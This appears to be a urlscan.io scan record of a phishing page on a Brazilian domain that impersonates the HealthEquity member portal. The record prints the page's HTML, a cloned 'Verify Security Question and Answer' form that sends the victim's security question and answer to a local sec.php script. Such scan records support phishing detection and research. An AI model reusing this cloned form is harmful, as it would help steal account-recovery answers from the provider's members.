aesprn.com.br Open in urlscan Pro
192.185.223.135  Public Scan

URL: http://aesprn.com.br/css/nku/security.html
Submission: On October 05 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

Name: aspnetFormPOST sec.php

<form name="aspnetForm" method="post" action="sec.php" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_modulePageContent_btnChangeSecurity2')" id="aspnetForm">
  <div>
    <input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="">
    <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="">
    <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
      value="LxkMXDKfJjXTJQtZsc8trPIhWeOkLcTqY6PA3x12iBfsSMa43YqN940U17CTK1a+bB8rKu+rbZNG3TOfIUH4YHwZrJ0AzYVhIXwZG67UwEwpTMXsK4aF/dyc5MHRv+JjLABiIm84bu/6IKp8W/wXRXcA4tHKrVVDjwYa2+sp7YZ1ocYh7Vd0lOdeod4e3GoL6iCb0s4PXxx/hoZ+ISxojK5HJUIRq9MRy59Wjnz6MsQF1P2N6KzFsxuTglM1ojhk0FH5H0KOA8wAwq3o7+ijFGMBytu9qY1mCx73KXOx6423Da5jfB/dM05XEbtUbyqokzFZ7mzTLjkrJj3l6k+ESWx2iTx7QyzhqWR/IZeL03Vwjibxu0EqLcGUPtkO3Qa8YyqvCLQeSwfsS38KY7dxARxTRQ+pvV0L1EddMpxGKfPC9xBy2i3lqpIdsn699KNMJuO8KpgFuGG9cZ+cX1LJRnu1RMjWSv8m9Hbj+7PR4TH/rXr8/cjSivtKSHTVBg8cILSeKPMo9fKRK6hOjKynbEsDpLtdo/Ka2HPvixbhh2MrEdcTadJjfHnk8N4UO1J5ylQZ+EU3p5qfy1/y2wa0Jcdv5YvgX/TOd4TAQsdOAWOg68YuBi0blMq/hHItY5uvUB5KwZWZRulVOs2iZeKSbk9rhZYL1ZM//nXHQhSKKfLSzda5ZSjfZnE1a+5ysQaE2zolJNR/mrXlCUGdfpzE0+S1LYUUiIHEbAEv7EOxqvFELaYVfZpVPBJjnXsEvXncPEbao1uwdzmuWHUUSekLbbn7lifxS6RBZi9cw7aOy60UAGipqZwKO0xcnjXghhzBlxlV+aaH1BblI5H/uvCIqFiRpwYrZIoONE5kZ9qpqeihXpTCMHv4yyeykK+GqQFRkvjVEit4wBlxTBtUsl7xp8EYwDR3z6iCYyJq4Mq8SFLQlneyk0AeaexRUCUcznVkmwlmxAvHXMK5fQgKNXLDZStEuabcdz/fgc8z3YspLVGI9C8iQM7dArnbRNO66hHV0anjSLac/ahhLco0zCfR+Ils9QQoYT8xMseiAyl3SOZFJxepZJDvezOlKDcqGmUct9MQh7LDIePFR9lhl5soylPMr3ER7u/CkVn8rYNkAl4Le2CHD5mWdOZhR1p6HoYm/LHPA2gA27MA/dWjEGZlzGoaSCPhpVs3JHBSGxXVRPpQeTrlETPcWChmzMaIRn31JTanuyrYNcicZ0uE/Gw0iYZVpUcbAokGGnVBXQY2e1VSv4Kaq7cOF+hzJpz9b3e9yXn8i/f46uY3EBBFI626LxfJnV0EQgWyCh9uXCzxsbNdH6CNNTQrAaZbpiTUUxgHmafnzRs7pCpgcre86puG1Zd407rjqSL4T7lFI3TZGQY2AJ2KOLkB3j+9sGv7Inn/9sneFrV1kiLwFCgXga43n1JSRO5eT5lQ985G8FuXVVAChlMK4bwQIxgSH74MpmGAQUoMsiaRskIby4UfFn6SfzW7ANwY1/nh2lMiXN653TVss7bhQJrasyMPYghT1wBwxqzey7r06WucjjOUXQ15+3afSAazeaJqLgoYZz1DoLdyycUGOG5tXvA/NWAqQpMj+UOMeDVgr9pEKOq6AQu/hnY6qWLknNIsjMTqec9VFrWh0XJ8nkTyQM3A4XpKIlG+lfJJ/98KzUOGhitoJJFepczpq6d4cv5t7TGJLqe6GZRrYBp3wwJ/dzoHGjvEVDCoRSzSZ5/oRxnUvyJGdV3Af1ZiUZd0eD/Ww7EI0J2cXg+TBcUdfN0DwqsZy77CaWzNjEWcPORvQybjuf6pmDDIYo+Q2HRNNZlY9TExMw7WZIQ=">
  </div>
  <script type="text/javascript">
    //<![CDATA[
    var theForm = document.forms['aspnetForm'];
    if (!theForm) {
      theForm = document.aspnetForm;
    }

    function __doPostBack(eventTarget, eventArgument) {
      if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
      }
    }
    //]]>
  </script>
  <script src="https://my.healthequity.com/WebResource.axd?d=pynGkmcFUV13He1Qd6_TZCXqyocCBF2oKgLM0XmYKlLsjBe9CEllS2tf9ZtQD1fhJxcj7lZnbbBy6zFnpg1iQQ2&amp;t=635875260900000000" type="text/javascript"></script>
  <script src="OpenWindow.js" type="text/javascript"></script>
  <script src="https://my.healthequity.com/ScriptResource.axd?d=nv7asgRUU0tRmHNR2D6t1ALZpaBjeJUPjltGs8Fhv5gnBa-rs-3BtVH2HByjh9dIdGUMz6zYyHxIDxlvVfZvSOCfVvvSipQH2lnm6KpksJtVpX5XaLQGGLnxAreqNNE5eesfxiW-SEMKQCbJqbcaDA2&amp;t=361e7a19"
    type="text/javascript"></script>
  <script
    src="https://my.healthequity.com/ScriptResource.axd?d=NJmAwtEo3Ipnlaxl6CMhvtXOU04gjt3LdwaAHOKgQ5zz8xj_QISupo8iwsEKwztZ1wW1JEzza_l1lB1yJjWha-Bm_vI1joZNaDNpCEwTX6EFsZQtR-slA1ccBp8N1U0xNSzZtSSG6vWVgei9up-t1sDLkew2VdFw65J1YAVThvs1&amp;t=ffffffffeea0dba9"
    type="text/javascript"></script>
  <script
    src="https://my.healthequity.com/ScriptResource.axd?d=dwY9oWetJoJoVpgL6Zq8OF4_xJZEO01pxM20L4bhuTK3rBO57ryItU5HAqqg5dgwOklL0TrsLQ9J7Kl1ko1d_9kVMidUYam4X3VNnHt00_Vlg7oeAiI2dlCDLpcwRhy-H7iDlIIvxoCWkQsS5q_JO5orYCCK0sh_3VgobaegAZc1&amp;t=ffffffffeea0dba9"
    type="text/javascript"></script>
  <script src="Webkit.js" type="text/javascript"></script>
  <script src="https://my.healthequity.com/WebResource.axd?d=JoBkLzP19aTuxbWOhHobYrU_d1MH0V6JvWNdHe4TwIMoQh8BIUWDC0maRmJBtx7-RUibCAdG3-WwN_V3PLyE-A2&amp;t=635875260900000000" type="text/javascript"></script>
  <script type="text/javascript">
    //<![CDATA[
    function WebForm_OnSubmit() {
      if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
      return true;
    }
    //]]>
  </script>
  <div>
    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D90685D7">
    <input type="hidden" name="__VIEWSTATEENCRYPTED" id="__VIEWSTATEENCRYPTED" value="">
    <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION"
      value="ihLxm7rURJ8Cm+TnGB2dHGrTqQbySZhzmYk2WcnVwu1TEnbW3tKSxhpgAgidw3P++D7/+hl26iqzSgbyq0ZDqN9mA3cxyLYzpYY/sZtMU/pE327AwvDJQRW9YKt7/G/Qy0rXw70OVcbL9GpwrlAjuoWScSNgpwHvc6x4qgREKhaU+vQL/QW1F84S0Oy6vEV21fTgXBqhaZrQDE4zwLxSq2de2mYfN1OWCAC8sMF3GtL8CW46b4VMEzhZH7FI1k9s">
  </div>
  <div id="TNpageMainDiv">
    <table width="100%" id="ctl1">
      <tbody>
        <tr>
          <td align="left" id="header-left">
            <div id="company-logo" style="width:95%;">
              <style type="text/css">
                .scopeId {}
              </style>
              <div class="offscreen">If you are having this website systematically read to you, please call 8,6,6,3,4,6,5,8,0,0. Health Equity provides twenty-four hour member service support to answer questions or perform internet based
                transactions. Please call 8,6,6,3,4,6,5,8,0,0 and a member service specialist will assist you.</div>
              <div id="headerContentSection">
                <div id="headerLeftHalf">
                  <div style="float:left;">
                    <a id="ctl00__HeaderSection1_hlLeftLogo" href="https://my.healthequity.com/He.aspx" style="display:inline-block;border-width:0px;"><img src="https://my.healthequity.com/App_Themes/HETheme_v3/images/HEQ_Logo_1.png" alt="" border="0" style="border-width:0px;"></a>
                  </div>
                  <div>
                  </div>
                </div>
                <div id="headerRightHalf" style="float:right;">
                  <!-- Right Corner Logos -->
                  <a id="ctl00__HeaderSection1_hlRightPoweredBy" href="He.aspx"></a>
                  <a id="ctl00__HeaderSection1_hlRightLogo" href="https://my.healthequity.com/He.aspx" style="display:inline-block;border-width:0px;"><img src="https://my.healthequity.com/App_Themes/HETheme_v3/images/LayoutPrivate_LogoSmall.gif" alt="" border="0" style="border-width:0px;"></a>
                  <div class="headerRightBottomWhite">
                  </div>
                </div>
              </div>
            </div>
          </td>
        </tr>
        <tr>
          <td height="41" colspan="3" align="right">&nbsp;</td>
        </tr>
      </tbody>
    </table>
    <div id="bodyContainer" style="width: inherit">
      <div id="content-col">
        <div>
          <link href="font-awesome.min.css" rel="stylesheet">
          <script src="materialDesign.js" type="text/javascript"></script>
          <script src="jquery.smartbanner.js" type="text/javascript"></script>
          <script src="angular.js" type="text/javascript"></script>
          <script src="angular-route.min.js" type="text/javascript"></script>
          <script src="date.js" type="text/javascript"></script>
          <script src="heSharedModule.js" type="text/javascript"></script>
          <script src="heSharedServices.js" type="text/javascript"></script>
          <script src="heSharedDirectives.js" type="text/javascript"></script>
          <script src="HeAjaxHelper.js" type="text/javascript"></script>
          <script src="ui-bootstrap-0.5.0.js" type="text/javascript"></script>
          <script src="ui-bootstrap-tpls-0.5.0.js" type="text/javascript"></script>
          <script src="ui-bootstrap-tpls.js" type="text/javascript"></script>
          <script src="documentsApp.js" type="text/javascript"></script>
          <script src="documentsController.js" type="text/javascript"></script>
          <script src="documentsModalController.js" type="text/javascript"></script>
          <script src="documentsService.js" type="text/javascript"></script>
          <script type="text/javascript">
            $(function() {
              $.smartbanner({
                title: 'HealthEquity Mobile',
                author: 'HealthEquity Inc.',
                icon: 'images/heqmobile.png'
              });
            })
          </script>
          <script type="text/javascript">
            function linkLabelToTextBox(parentName, labelName, fieldPattern) {
              var parent = document.getElementById(parentName);
              var label = document.getElementById(labelName);
              //Now look through all parent childNodes searching for one with an id that contains fieldPattern
              for (i = 0; i < parent.childNodes.length; i++) {
                var fieldID = parent.childNodes[i].id;
                if (fieldID != null) {
                  if (fieldID.search(fieldPattern) > -1) {
                    label.setAttribute('for', fieldID);
                    break;
                  }
                }
              }
            }
          </script>
          <h2>Verify Security Question and Answer</h2>
          <div class="panel panel-default">
            <div class="panel-body">
              <div class="row">
                <div class="col-sm-6">
                  <div class="form-group he-input">
                    <input name="sec" type="text" id="ctl00_modulePageContent_txtNewSecurityQuestion" class="form-control" autocomplete="off">
                    <label for="ctl00_modulePageContent_txtNewSecurityQuestion">Security Question</label>
                    <div class="bar"></div>
                  </div>
                  <div class="form-group he-input">
                    <input name="ans" type="password" id="ctl00_modulePageContent_txtNewSecurityAnswer" class="form-control" autocomplete="off" style="left: 0px; top: 0px">
                    <label for="ctl00_modulePageContent_txtNewSecurityAnswer">Security Answer</label>
                    <div class="bar"></div>
                  </div>
                </div>
              </div>
              <div style="clear: both;">
                <span id="ctl00_modulePageContent_CompareValidatorSecurityAnswer" class="inline-error" style="color:White;visibility:hidden;">Security Answers must match</span>
              </div>
              <div style="float: left; padding-top: 10px">
                <input type="submit" name="ctl00$modulePageContent$btnChangeSecurity2" value="Submit"
                  onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$modulePageContent$btnChangeSecurity2&quot;, &quot;&quot;, true, &quot;&quot;, &amp;quotquot;&quot;, false, false))"
                  id="ctl00_modulePageContent_btnChangeSecurity2" class="btn btn-default" style="float: none;">
                <input type="submit" name="ctl00$modulePageContent$btnChangeSecurityCancel2" value="Cancel"
                  onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$modulePageContent$btnChangeSecurityCancel2&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))"
                  id="ctl00_modulePageContent_btnChangeSecurityCancel2" class="btn btn-secondary" style="float: none;">
              </div>
            </div>
          </div>
          <br>
        </div>
      </div>
    </div>
  </div>
  <script type="text/javascript">
    //<![CDATA[
    var Page_Validators = new Array(document.getElementById("ctl00_modulePageContent_CompareValidatorSecurityAnswer"));
    //]]>
  </script>
  <script type="text/javascript">
    //<![CDATA[
    var ctl00_modulePageContent_CompareValidatorSecurityAnswer = document.all ? document.all["ctl00_modulePageContent_CompareValidatorSecurityAnswer"] : document.getElementById("ctl00_modulePageContent_CompareValidatorSecurityAnswer");
    ctl00_modulePageContent_CompareValidatorSecurityAnswer.controltovalidate = "ctl00_modulePageContent_txtNewSecurityAnswerVerify";
    ctl00_modulePageContent_CompareValidatorSecurityAnswer.errormessage = "Security Answers must match";
    ctl00_modulePageContent_CompareValidatorSecurityAnswer.evaluationfunction = "CompareValidatorEvaluateIsValid";
    ctl00_modulePageContent_CompareValidatorSecurityAnswer.controltocompare = "ctl00_modulePageContent_txtNewSecurityAnswer";
    ctl00_modulePageContent_CompareValidatorSecurityAnswer.controlhookup = "ctl00_modulePageContent_txtNewSecurityAnswer";
    //]]>
  </script>
  <script type="text/javascript">
    //<![CDATA[
    var Page_ValidationActive = false;
    if (typeof(ValidatorOnLoad) == "function") {
      ValidatorOnLoad();
    }

    function ValidatorOnSubmit() {
      if (Page_ValidationActive) {
        return ValidatorCommonOnSubmit();
      } else {
        return true;
      }
    }
    WebForm_AutoFocus('ctl00_modulePageContent_txtUserIdChangeSecurity');
    document.getElementById('ctl00_modulePageContent_CompareValidatorSecurityAnswer').dispose = function() {
      Array.remove(Page_Validators, document.getElementById('ctl00_modulePageContent_CompareValidatorSecurityAnswer'));
    }
    //]]>
  </script>
</form>

Text Content

If you are having this website systematically read to you, please call
8,6,6,3,4,6,5,8,0,0. Health Equity provides twenty-four hour member service
support to answer questions or perform internet based transactions. Please call
8,6,6,3,4,6,5,8,0,0 and a member service specialist will assist you.

 


VERIFY SECURITY QUESTION AND ANSWER

Security Question

Security Answer

Security Answers must match


©2016 HealthEquity, Inc.
 * Privacy Policy      
 * Terms of Use      
 * Security

DigiCert